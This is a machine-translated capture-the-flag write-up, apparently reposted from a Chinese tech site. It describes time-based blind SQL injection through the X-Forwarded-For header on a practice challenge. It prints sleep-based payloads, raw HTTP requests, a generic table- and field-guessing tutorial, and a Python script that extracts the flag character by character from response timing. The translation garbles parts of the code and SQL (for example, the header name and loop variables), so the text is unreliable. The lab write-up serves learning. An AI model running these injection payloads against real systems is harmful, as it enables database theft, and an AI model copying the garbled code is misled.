Shulou(Shulou.com)06/03 Report--

First of all, I admit that I saw what other people did.

Because I didn't have any experience, although I knew that the echo was caused by the X-Forwarded-For parameter, but I couldn't use it all the time, so I looked at demo.

It is hereby recorded because it involves writing a script to record the injection process.

I looked at two demo and chose the most direct one, which is to use awvs scan and then python scan, because I don't think I have the ability to find injection points manually. Learn to use tools first.

Although others wrote to use awvs, no matter how the scan was done at first, it couldn't be scanned later. A simple solution turns out to be as follows:

It was so simple, and then I found that it could be injected, and it seemed to be based on the time delay, but there was no systematic learning and I didn't understand the late supplementary learning content.

The content is as follows:

Tests performed:

(select (0) from (select (sleep (6) v) / *'+ (select (0) from (select (sleep (6) v) +'"+ (select (0) from (select (sleep (6) v) +" * / = > 6.053 s

(select (0) from (select (sleep (0) v) / *'+ (select (0) from (select (sleep (0) v) +'"+ (select (0) from (select (sleep (0) v) +" * / = > 0.062 s

(select (0) from (select (sleep (3) v) / *'+ (select (0) from (select (sleep (3) v) +'"+ (select (0) from (select (sleep (3) v) +" * / = > 3.042 s

(select (0) from (select (sleep (9) v) / *'+ (select (0) from (select (sleep (9) v) +'"+ (select (0) from (select (sleep (9) v) +" * / = > 9.033 s

(select (0) from (select (sleep (0) v) / *'+ (select (0) from (select (sleep (0) v) +'"+ (select (0) from (select (sleep (0) v) +" * / = > 0.047 s

(select (0) from (select (sleep (0) v) / *'+ (select (0) from (select (sleep (0) v) +'"+ (select (0) from (select (sleep (0) v) +" * / = > 0.047 s

(select (0) from (select (sleep (0) v) / *'+ (select (0) from (select (sleep (0) v) +'"+ (select (0) from (select (sleep (0) v) +" * / = > 0.046 s

(select (0) from (select (sleep (6) v) / *'+ (select (0) from (select (sleep (6) v) +'"+ (select (0) from (select (sleep (6) v) +" * / = > 6.052 s

(select (0) from (select (sleep (0) v) / *'+ (select (0) from (select (sleep (0) v) +'"+ (select (0) from (select (sleep (0) v) +" * / = > 0.063 s

Original value: 1

Then use http editor to test

The simplified get data is

GET / web/wonderkun/ HTTP/1.1

X-Forwarded-For: 1 from + (select 1 from (select (sleep (5) v) +'

Referer: http://ctf5.shiyanbar.com/web/wonderkun/index.php

Host: ctf5.shiyanbar.com

This is effective.

Repeated changes should be done in select (sleep (5)).

Because I accidentally saw that demo used the case statement, I used this statement on the test machine to test:

Select case when (select length (test) from aaa) then sleep (2) else sleep (0) end

It's effective.

Replacing get data is still effective.

Then I thought about the test of the experimental bar, and basically the table fields were all flag, so I tried to see if it seemed possible.

The get request is:

GET / web/wonderkun/ HTTP/1.1

X-Forwarded-For: 1 else sleep + (select 1 from (select case when (select length (flag) from flag) > 10 then sleep (2) else sleep (0) end) v) +'

Referer: http://ctf5.shiyanbar.com/web/wonderkun/index.php

Host: ctf5.shiyanbar.com

And then we started to judge his value, but it seems that we need to use a loop function to guess, even though he gave it to demo, he still did it himself.

First of all, I know that the table field only needs to guess the field data length and each letter of the field.

First of all, how to guess the field data length of Baidu is as follows:

1. Guess the table name:

Http://xxx.com/test.asp?id=123 and (select count (*) from admin) > = 0ram / guess if there is a table admin

two。 Guess the field name:

Http://xxx.com/test.asp?id=123 and (select count (adminname) from admin) > = whether there is a field adminname in the 0//admin table

3. Guess the field length:

/ / Select the first record from the admin table to obtain the adminname field length of this record

Http://xxx.com/test.asp?id=123 and (select top 1 len (adminname) from admin) > = 0

Http://xxx.com/test.asp?id=123 and (select top 1 len (adminname) from admin) = 7 / Field adminname length is 7

4. Guess the field value:

/ / Select the first record from the admin table and guess the value of the field adminname one by one until 7

Http://xxx.com/test.asp?id=123 and (select top 1 asc (mid (adminname,1,1)) from admin) = 97

Http://xxx.com/test.asp?id=123 and (select top 1 asc (mid (adminname,2,1)) from admin) = 78

Http://xxx.com/test.asp?id=123 and (select top 1 asc (mid (adminname,3,1)) from admin) = 96

.

Http://xxx.com/test.asp?id=123 and (select top 1 asc (mid (adminname,7,1)) from admin) = 102

First guess the length of the field.

Field length guessing should be done manually very quickly.

Repeatedly greater than less than the result should be 32 characters (the len used above seems to be different from the database. I use the length here)

GET / web/wonderkun/ HTTP/1.1

X-Forwarded-For: 1 else sleep + (select 1 from (select case when ((select length (flag) from flag) = 32) then sleep (1) else sleep (0) end) v) +'

Referer: http://ctf5.shiyanbar.com/web/wonderkun/index.php

Host: ctf5.shiyanbar.com

Here I say that the tool I use is still awvs's http editor.

Then continue to write the sql of the validation string on the test machine, but I'll try to create a simulated table first.

I just found out that if should also be able to do it without using case if to look clearer.

Select if ((select length (flag) from flag) = 32 flag sleep (1), sleep (0))

It's a pity that I replaced the sleep with this failure, ah, continue to see how to judge that the only thing I should be able to use now can be used.

Select substring (flag,2,1) from flag should work like this. You should use the substring function, which should be the same as mid.

Try it. By convention, the value should be flag {}. Try it

GET / web/wonderkun/ HTTP/1.1

X-Forwarded-For: 1 else sleep + (select 1 from (select case when ((select substring (flag,1,1) from flag) ='f') then sleep (1) else sleep (0) end) v) +'

Referer: http://ctf5.shiyanbar.com/web/wonderkun/index.php

Host: ctf5.shiyanbar.com

But it seems that time is not 1s guess failed? In retrospect, if didn't work just now.

Echo of if:

Your ip is: 1 select length + (select 1 from (select if ((select length (flag) from flag)) = 32

It seems to have been truncated since.

It seems that we can't move forward without solving the comma.

Keep searching for information.

Http://www.91ri.org/12168.html

Have to admire the strength of the resources.

Modified request:

GET / web/wonderkun/ HTTP/1.1

X-Forwarded-For: 1 then sleep + (select 1 from (select case when ((select substring (flag from 1 for 1) from flag) ='f') then sleep (1) else sleep (0) end) v) +'

Referer: http://ctf5.shiyanbar.com/web/wonderkun/index.php

Host: ctf5.shiyanbar.com

Then I tried it. It didn't seem to work. I changed the following sleep (0) to 5.

Start writing scripts.

(first of all, you need a python example manual)

First search request and then see how the get request is written and join the header information

Give it a shake

Because repeated calls may be required to encapsulate a method first.

I don't know how to add {}, so I also took a look at Baidu.

And then it should be how to judge the time, just need time to take pre-execution and post-execution, and then the whole cycle should be able to work.

The following code can be completed with comments:

#-*-coding: utf-8-*-

Import requests

Import time

# define a method to return the time difference var defines as guessing how many bits the character num is guessing

Def test (var,num):

# url links

Url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'

# header information X-Forwarded-For insert variable

Headers = {}

# X-Forwarded-For specifies that if this character is used to sleep for 5 seconds

Headers ['Xmurf var'] = "" 1 colors + (select 1 from (select case when ((select substring (flag from "+ str (num) +" for 1) from flag) ='"+ str (var) +") then sleep (5) else sleep (0) end) v) +'"

Headers ['Referer'] =' http://ctf5.shiyanbar.com/web/wonderkun/index.php'

Headers ['Host'] =' ctf5.shiyanbar.com'

# time acquisition before execution

Time_start=time.time ()

R = requests.get (url,headers=headers)

# time acquisition after execution

Time_stop=time.time ()

# return time difference

Return int (time_stop)-int (time_start)

# define testChar as a string dictionary

TestChar='abcdefghijklmnopqrstuvwxyz0123456789@_. {} -'

# how many strings are detected manually for 32-bit loop guessing to enter a loop first?

For x in xrange (1, 033):

# Loop a single cracked word

For j in testChar:

# determine whether the time difference is greater than or equal to 5

If test (jPowerx) > = 5:

# characters after cracking

Print str (x) +':'+ str (j)

It is worth noting that I began to write it wrong and wrote it as 32, and only 31 values came out of xrange 1. There is also this question did not say ctf {} expand to pit ah!

Title:

Http://ctf5.shiyanbar.com/web/wonderkun/index.php

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.